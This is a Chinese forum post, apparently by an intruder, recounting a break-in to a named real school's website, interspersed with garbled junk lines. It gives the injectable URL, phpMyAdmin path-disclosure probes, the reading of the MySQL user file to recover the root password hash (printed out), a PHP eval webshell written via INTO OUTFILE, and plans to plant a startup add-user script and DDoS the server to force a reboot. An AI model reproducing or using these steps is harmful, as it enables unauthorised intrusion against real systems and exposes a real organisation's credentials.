友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！


0 v1 T3 I. p$ l# I, U
$ s3 L1 @6 z0 c5 J/ ~常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
8 Z0 h* ]* j* L( K' L" g+ @, G) E6 S+ Z4 I
, [. q& A& F3 ~& f7 _! m3 {那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
' V0 @5 a3 V, R; N3 O0 E
) G( E* {7 D5 ]5 M) r# ~0 E试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
. B% b7 s% o* U6./phpmyadmin/libraries/lect_lang.lib.php  
' u4 y7 \5 M6 \0 H7./phpmyadmin/libraries/mcrypt.lib.php   
0 w$ ^$ V: N* ?* y; e8./phpmyadmin/libraries/export/xls.php  
: ^, G! g/ l4 L* d& X5 ~# ^4 K
' b0 g& x! ~" z% M4 L: _均不行...........................
! L5 D7 C. m7 }% r" j) `
. B: r; u! b2 b5 [5 U- s+ m! O御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

8 N: k- ^3 G: x  o$ B9 D权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

, f# b) J+ F9 O4 ~/ x& ]' q敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
% s1 {, v# L( L; f, s
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

0 Y" _) k- n' F: Thttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

  q  r( o0 J; D, M/ o自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
' h% I7 @9 Q0 Y' S0 p& |
) V. V& D& T' O成功读到root密码：
3 l) |' M2 }- r4 A& @+ U/ M6 C
17---- r(0072)
" P7 N  B( ?7 @* Z" @18---- o(006f)
19---- o(006f)
20---- t(0074)
4 Q3 X* x* h9 K/ f9 Q21---- *(002a)
4 N- Q5 Y1 w& G4 [22---- 8(0038)
$ l  Y: @' l, `' s4 o; O/ c. }23---- 2(0032)
) B8 o8 A7 K) m6 D24---- E(0045)
/ T" c# U% [7 X- i9 p. V, \; m) h25---- 1(0031)
26---- C(0043)
5 s6 S& D0 z* @$ _3 O5 n27---- 5(0035)
/ A6 X, R5 |4 D. e' z28---- 8(0038)
29---- 2(0032)
1 v3 w# Z% G' ^! j1 ~/ x+ y0 @. e30---- 8(0038)
, N( O8 w5 t; p& C6 L  A$ M31---- A(0041)
) A2 R3 @& l# N, v9 Z3 I% P32---- 9(0039)
, L" @8 X- d: j+ q- f( o33---- B(0042)
34---- 5(0035)
* ^# X/ J7 S4 R' {4 F/ ^35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
! G) z$ f( R. g38---- 4(0034)
4 }3 U$ C9 @3 w7 X' H39---- 9(0039)
: I, H* M& V2 z) W# _40---- 1(0031)
0 ]" d8 ^2 ^3 A9 t41---- 1(0031)
& ?+ t! s. s; _7 x9 [42---- 5(0035)
43---- 3(0033)
& u3 ~  q1 d) y44---- 5(0035)
45---- 9(0039)
, C, @1 u2 |/ {, {: W5 }( l8 _46---- 8(0038)
! h# j3 i1 V  @6 ]; Q47---- F(0046)
# t% K9 @, M5 K2 `4 q3 I0 K48---- F(0046)
: s7 N! X; M. J& K# h49---- 4(0034)
50---- F(0046)
, Q1 _3 R- U( `( c" W51---- 0(0030)
/ W- C1 i$ k; z" T- O/ F5 l52---- 3(0033)
53---- 2(0032)
54---- A(0041)
55---- 4(0034)
- ?- i$ O" i6 b7 d  m( r5 }( U56---- A(0041)
- H0 ?- V  j$ m8 t4 r) Y# h% [$ z57---- B(0042)
9 e/ G% M8 K" y) B% ?# F/ p58---- *(0044)
59---- *(0035)
/ I2 F) u- }: }. s: C+ I60---- *(0041)
61---- *0032)

解密后成功登陆phpmyamin
                          
; w! `  I6 X& J
                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

8 K/ V% Z8 o9 ^/ @. \0 ]+ g; s成功执行，拿下shell，菜刀连接：
0 o0 L9 s, h+ v5 E4 G
服务器不支持asp,aspx,php提权无果...................
, ^" O) H) J2 C( C
3 u7 r5 H: d1 P* Y* Y. \但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
9 Q; y2 k) N: G0 t5 n4 B) q

服务器上已经有个隐藏帐号了

% X8 _6 T6 @" B/ n% B

别名     administrators
1 Y" {7 [8 P* }; e注释     管理员对计算机/域有不受限制的完全访问权

成员

4 T/ d( W$ E) z* K# O; q6 @

-------------------------------------------------------------------------------
0 x3 `* Q5 e  C$ x' gadmin
6 u$ \2 o6 h; m0 t  f/ @' IAdministrator
) z, Y+ k: T# \' T3 `slipper$
sqluser
1 n: E4 G' }! h, f: l命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

0 D: W2 A9 [% z3 L" Sddos服务器重启，不然就只能坐等服务器重启了...............................

      

angel